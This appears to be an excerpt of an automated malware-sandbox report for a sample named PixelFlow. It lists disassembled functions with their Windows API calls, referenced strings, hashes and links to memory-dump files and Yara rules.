Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconLoad
String ID: ,jl0jl$,jl0jl$blank$info$question$stop$warning
API String ID: 2457776203-2776462167
Opcode ID: bbaba0120b8bcc180ffd2c6a9844a8a3d3131239145ec99ad1caacc85d36f806
Instruction ID: 7b3270171ca1e9e34d450d0ad7f112ec7c31800292342df56b2d8f86097df5b8
Opcode Fuzzy Hash: bbaba0120b8bcc180ffd2c6a9844a8a3d3131239145ec99ad1caacc85d36f806
Instruction Fuzzy Hash: 73112B32748766BAE7114B15AC82CEA77DFEF15720B10001EF604A63C2DFB96F8146B5

Function 0065992A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 0065B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0065B5A0

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006599AF
GetDlgCtrlID.USER32 ref: 006599BA
GetParent.USER32 ref: 006599D6
SendMessageW.USER32(00000000,?,00000111,?), ref: 006599D9
GetDlgCtrlID.USER32(?), ref: 006599E2
GetParent.USER32(?), ref: 006599FE
SendMessageW.USER32(00000000,?,?,00000111), ref: 00659A01

Strings

ComboBox, xrefs: 00659937
ListBox, xrefs: 0065996C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: d3267c487b33ca00ac48df45ad6e28a6b892e5db88eaa0b50fe89d5b209d9729
Instruction ID: 26bb008c87cba13006600d88ec8148ceeb32e0f3609599184417770fab1313f1
Opcode Fuzzy Hash: d3267c487b33ca00ac48df45ad6e28a6b892e5db88eaa0b50fe89d5b209d9729
Instruction Fuzzy Hash: 1B21B075A00204AFDF04EF60CC95EFEBB6AEF96300F10411AF96197291DB754869DB24

Function 00659A15 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 0065B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0065B5A0

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00659A98
GetDlgCtrlID.USER32 ref: 00659AA3
GetParent.USER32 ref: 00659ABF
SendMessageW.USER32(00000000,?,00000111,?), ref: 00659AC2
GetDlgCtrlID.USER32(?), ref: 00659ACB
GetParent.USER32(?), ref: 00659AE7
SendMessageW.USER32(00000000,?,?,00000111), ref: 00659AEA

Strings

ComboBox, xrefs: 00659A22
ListBox, xrefs: 00659A57

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 740d4d898bf302b292c7a7f5ebbc578804d86fe478ea805306314639489c798e
Instruction ID: 2ce9d158a6435a8ace1b881886fdb571927f2a71b236c13211d573d31e46a1fd
Opcode Fuzzy Hash: 740d4d898bf302b292c7a7f5ebbc578804d86fe478ea805306314639489c798e
Instruction Fuzzy Hash: FB21BDB5A00108AFDB04EF60CC85EEEBBAAEF96300F004016B95197291DB794869DB24

Function 00659AFE Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00659B0A
GetClassNameW.USER32(00000000,?,00000100), ref: 00659B1F
_wcscmp.LIBCMT ref: 00659B31
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00659BAC

Strings

largeicons, xrefs: 00659B40
smallicons, xrefs: 00659B74
details, xrefs: 00659B5A
list, xrefs: 00659B8E
SHELLDLL_DefView, xrefs: 00659B2B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 60f6ad3730ee5b1fc2b34f23aee8fad0d4edf1c5cf21c9d777d95a3ea15df130
Instruction ID: 2f227f17a6139e5bdfbc457a997e332fca23e0fc9c181feaf2ced2ad160bd965
Opcode Fuzzy Hash: 60f6ad3730ee5b1fc2b34f23aee8fad0d4edf1c5cf21c9d777d95a3ea15df130
Instruction Fuzzy Hash: D811E3B6248316FEFA202A24FC06DF7339FDB15722F200016FD04B61E2FFA668554A65

Function 00678D5D Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00678D89
CoInitialize.OLE32(00000000), ref: 00678DB6
CoUninitialize.OLE32 ref: 00678DC0
GetRunningObjectTable.OLE32(00000000,?), ref: 00678EC0
SetErrorMode.KERNEL32(00000001,00000029), ref: 00678FED
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00693BDC), ref: 00679021
CoGetObject.OLE32(?,00000000,00693BDC,?), ref: 00679044
SetErrorMode.KERNEL32(00000000), ref: 00679057
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006790D7
VariantClear.OLEAUT32(?), ref: 006790E7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: f1b9511678d2517e28c3fe135f9d9fec548946f95c8bde59510985dda727a571
Instruction ID: 5c63514351d30222563d81a4c6f027f75f4853c550b5d7ecfa72dcbf8cabb566
Opcode Fuzzy Hash: f1b9511678d2517e28c3fe135f9d9fec548946f95c8bde59510985dda727a571
Instruction Fuzzy Hash: 6AC126B12043059FD740EF64C88496BB7EAFF89748F00895DF98A9B251DB71ED05CB92

Function 00661839 Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0066185B
GetForegroundWindow.USER32(00000000,?,?,?,?,?,006608D3,?,00000001), ref: 0066186F
GetWindowThreadProcessId.USER32(00000000), ref: 00661876
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006608D3,?,00000001), ref: 00661885
GetWindowThreadProcessId.USER32(?,00000000), ref: 00661897
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006608D3,?,00000001), ref: 006618B0
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006608D3,?,00000001), ref: 006618C2
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006608D3,?,00000001), ref: 00661907
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006608D3,?,00000001), ref: 0066191C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006608D3,?,00000001), ref: 00661927

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 5410897da33b224121b5e8dc321d78f9a776d702b335f681a7d298474d1fcdd6
Instruction ID: e52dbf47807156f5058762d6d7032cd428fed62bbbd5cadb82bfabe7da80f100
Opcode Fuzzy Hash: 5410897da33b224121b5e8dc321d78f9a776d702b335f681a7d298474d1fcdd6
Instruction Fuzzy Hash: 24318D72600208AFEB119F55EC88FB977AFEB5A311F18511AF910CB3A0D7B49D408F60

Function 0063C013 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0060260D
SetTextColor.GDI32(?,000000FF), ref: 00602617
SetBkMode.GDI32(?,00000001), ref: 0060262C
GetStockObject.GDI32(00000005), ref: 00602634
GetClientRect.USER32(?), ref: 0063C02C
SendMessageW.USER32(?,00001328,00000000,?), ref: 0063C043
GetWindowDC.USER32(?), ref: 0063C04F
GetPixel.GDI32(00000000,?,?), ref: 0063C05E
ReleaseDC.USER32(?,00000000), ref: 0063C070
GetSysColor.USER32(00000005), ref: 0063C08E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 9b2a32a6f22dbb6450fb83c24ace0a8b95bcc2a32a17e6a2e417f21fb40fb10f
Instruction ID: 0545c1575d2380e5412efe80cbc1fd6ff9c31133a348a1fddc23077c9a85b2cd
Opcode Fuzzy Hash: 9b2a32a6f22dbb6450fb83c24ace0a8b95bcc2a32a17e6a2e417f21fb40fb10f
Instruction Fuzzy Hash: D2114932540205AFEB615FA4EC0CBEA7B7BEF49331F104222FA26955E1CB320952EF51

Function 0065AB4C Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0065AF1D), ref: 0065AE5B

Strings

REGEXPCLASS, xrefs: 0065AC20
TEXT, xrefs: 0065AD92
CLASS, xrefs: 0065ABDA
NAME, xrefs: 0065AC8D
CLASSNN, xrefs: 0065ABFD
INSTANCE, xrefs: 0065AD69

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 7d986941be13dcaf254ccd7fee62581f55c17d7dca62e6b7fda2a963ef34649a
Instruction ID: 8f8bdf316f92496a7d276da3519fd777892f79b67b2a24bdca33e5ec4e4a06a5
Opcode Fuzzy Hash: 7d986941be13dcaf254ccd7fee62581f55c17d7dca62e6b7fda2a963ef34649a
Instruction Fuzzy Hash: 2491B470600515ABDB48EFA0C482BEAFB7BBF44301F508319DD5AA7242DF30699DDBA5

Function 006031F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0060327E

Part of subcall function 0060218F: GetClientRect.USER32(?,?), ref: 006021B8
Part of subcall function 0060218F: GetWindowRect.USER32(?,?), ref: 006021F9
Part of subcall function 0060218F: ScreenToClient.USER32(?,?), ref: 00602221

GetDC.USER32 ref: 0063CFA3
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063CFB6
SelectObject.GDI32(00000000,00000000), ref: 0063CFC4
SelectObject.GDI32(00000000,00000000), ref: 0063CFD9
ReleaseDC.USER32(?,00000000), ref: 0063CFE1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063D06C

Strings

U, xrefs: 0063CF41

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 1417cf4bd6511c088b8015ed5436640dc12051e81df10ed50b32d535338868a0
Instruction ID: a4559a594e85c746c58911bd647683fe9683ee96582196a6069c7f07b3d607da
Opcode Fuzzy Hash: 1417cf4bd6511c088b8015ed5436640dc12051e81df10ed50b32d535338868a0
Instruction Fuzzy Hash: E171F130500205EFCF299F64D884AFA7BBBFF49321F144269FD555A2A6C7318952DFA0

Function 006790F8 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00690980), ref: 006791DA
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00690980), ref: 0067920E
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00679388
SysFreeString.OLEAUT32(?), ref: 006793B2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 5ea86f6fbcc81f7edc8501b7c1147303f1ef2eed206e400975a8dd86fb0bd718
Instruction ID: 9581ccf60c0fab0a7c37a757b59abf33ecd5afdc9c5b2e6cffdf905536dc72f3
Opcode Fuzzy Hash: 5ea86f6fbcc81f7edc8501b7c1147303f1ef2eed206e400975a8dd86fb0bd718
Instruction Fuzzy Hash: 3CF10A71A00119EFDB14DF94C884EEEB7BAFF85315F148058F919AB291DB31AE46CB60

Function 0067FB45 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067FB66
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067FCF9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067FD1D
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067FD5D
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067FD7F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0067FEFB
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0067FF2D
CloseHandle.KERNEL32(?), ref: 0067FF5C
CloseHandle.KERNEL32(?), ref: 0067FFD3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: d9858c5c2b9f7e50a1b21cd204f51e60f62458d6d457ede835f0922812827600
Instruction ID: 1bb59061311620598af08c5b375426c3399de4eb7b64e9710f72e9a940c7384e
Opcode Fuzzy Hash: d9858c5c2b9f7e50a1b21cd204f51e60f62458d6d457ede835f0922812827600
Instruction Fuzzy Hash: 0FE1AF712047019FD764EF24C891EABBBE2AF85314F14896DF8999B3A2CB31DC41CB56

Function 006650E9 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00664A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006639F7,?), ref: 00664A4D

Part of subcall function 00664A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006639F7,?), ref: 00664A66

Part of subcall function 00664E59: GetFileAttributesW.KERNELBASE(?,00663A6B), ref: 00664E5A

lstrcmpiW.KERNEL32(?,?), ref: 00665168
_wcscmp.LIBCMT ref: 00665182
MoveFileW.KERNEL32(?,?), ref: 0066519D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 4b5c886777403ffc8f46e535e15b78c93adc61f042b3006ec4bfbd073b975cb2
Instruction ID: 8d242bb2cab4ec4532e8676f1d1d1b0cf8e124de3e33b231e3da2cb957f8f910
Opcode Fuzzy Hash: 4b5c886777403ffc8f46e535e15b78c93adc61f042b3006ec4bfbd073b975cb2
Instruction Fuzzy Hash: F651C9B20087859BC764DB90DC919DFB3DEAF85340F00092EF28AD3151EF35A689C75A

Function 00688A32 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00688AEC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6008800278c6bb265644293e130f5c5d6e08bf3a4951c6b626ca92bf0463fa90
Instruction ID: ddc99a3503d16bb9121b310e625561fb539816434dc57c3dc3d3249e615bc64c
Opcode Fuzzy Hash: 6008800278c6bb265644293e130f5c5d6e08bf3a4951c6b626ca92bf0463fa90
Instruction Fuzzy Hash: 7251C170541204BFEF64AF68CC89BA97BA7FB05750FA00616F514E72E1CF71A980CB54

Function 00602F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063C568
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C58A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063C5A2
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063C5C0
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063C5E1
DestroyIcon.USER32(00000000), ref: 0063C5F0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063C60D
DestroyIcon.USER32(?), ref: 0063C61C

Part of subcall function 0068A89C: DeleteObject.GDI32(00000000), ref: 0068A8D5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 9712f012b01b1e5576c408f568e7357ba43c8e4c106d7417ec4ffcabe5e00b80
Instruction ID: add8fe4d05eb822e26ab718bea83e2397e20b2e76fb1a4c947e14a994de96d74
Opcode Fuzzy Hash: 9712f012b01b1e5576c408f568e7357ba43c8e4c106d7417ec4ffcabe5e00b80
Instruction Fuzzy Hash: 63514A7068020AAFDB24DF24CC59BAA77BBEF48760F104519F902A72D0DB70ED51DBA0

Function 0065A009 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0065B310: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065B330
Part of subcall function 0065B310: GetCurrentThreadId.KERNEL32 ref: 0065B337
Part of subcall function 0065B310: AttachThreadInput.USER32(00000000,?,0065A01E,?,00000001), ref: 0065B33E

MapVirtualKeyW.USER32(00000025,00000000), ref: 0065A029
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0065A046
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0065A049
MapVirtualKeyW.USER32(00000025,00000000), ref: 0065A052
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0065A070
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0065A073
MapVirtualKeyW.USER32(00000025,00000000), ref: 0065A07C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0065A093
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0065A096

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1385c71e17335675d8f5170e8a82e8469e36337f847879bae760b0aecdce2648
Instruction ID: 5f5b9d02ebb1cb7de3037f83f357c5bdb798e764999e92f7a07873ef115d2669
Opcode Fuzzy Hash: 1385c71e17335675d8f5170e8a82e8469e36337f847879bae760b0aecdce2648
Instruction Fuzzy Hash: F2110471510218BEFB106FA0CC89F6A3F2EEB4C755F10141AF6406B0D0CAF25C509AA4

Function 006592BC Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00658F3D,00000B00,?,?), ref: 006592C5
HeapAlloc.KERNEL32(00000000,?,00658F3D,00000B00,?,?), ref: 006592CC
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00658F3D,00000B00,?,?), ref: 006592E1
GetCurrentProcess.KERNEL32(?,00000000,?,00658F3D,00000B00,?,?), ref: 006592E9
DuplicateHandle.KERNEL32(00000000,?,00658F3D,00000B00,?,?), ref: 006592EC
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00658F3D,00000B00,?,?), ref: 006592FC
GetCurrentProcess.KERNEL32(00658F3D,00000000,?,00658F3D,00000B00,?,?), ref: 00659304
DuplicateHandle.KERNEL32(00000000,?,00658F3D,00000B00,?,?), ref: 00659307
CreateThread.KERNEL32(00000000,00000000,0065932D,00000000,00000000,00000000), ref: 00659321

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
